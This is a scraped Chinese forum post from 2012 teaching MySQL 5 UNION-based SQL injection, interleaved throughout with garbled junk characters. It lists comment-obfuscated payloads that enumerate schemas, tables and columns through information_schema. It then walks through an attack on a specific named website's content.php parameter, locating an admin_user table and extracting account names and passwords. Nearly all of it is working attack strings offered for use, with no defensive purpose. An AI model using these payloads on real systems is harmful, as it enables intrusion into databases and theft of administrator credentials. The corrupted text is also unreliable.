查库/ m- R' B; c2 v
) J+ ~1 y" G3 x/ H: r* gid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*, o0 C& S# }. r8 G; X
9 C! k8 x4 f2 A. _查表6 {1 m! d* T1 p; k- c
3 D7 N6 a: I" t6 e) @+ H) g. V
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
$ S+ Z# k' P Q6 ^& ?2 E
3 J! I% o# U5 v$ j查段
! b O) H s: U' _# b/ h( T& Y- o) L: B
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
0 I3 c) }9 w5 F: b( c' D, B8 O) L5 P& |7 K1 P( G0 t$ D
) S" J1 @* c/ emysql5高级注入方法暴表
% O6 d1 K1 |/ {3 B6 \ U- s
% o* M6 m3 b/ G, k c7 y例子如下:
2 h0 L+ _) S' _9 a( T z" C3 H* Y- v I# H6 V; L7 h
1.爆表+ i9 l# R7 p- j' J- w7 A: K/ ~/ M
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)( i& G5 @& S' A& B$ T. ~
这样爆到第4个时出现了admin_user表。3 I$ L- g7 Z/ c
! j' z+ f, O: h! q4 x. @
2.暴字段
% _. n J6 g; V( D5 Z8 ihttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*4 R+ v& c2 t4 A
8 g3 J1 s+ I0 R
, b$ V6 f2 L& E- l$ L b! v7 v3.爆密码1 f7 ?6 I9 U2 P1 B- l
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* % l6 Y7 k* W8 S1 X( S+ R
! _! x# N1 C9 X+ j3 c; b% C9 ?+ X
+ x5 m) S8 `9 k" }6 Y* D5 |
|
发表于 2012-9-13 16:29:37
收藏
支持
反对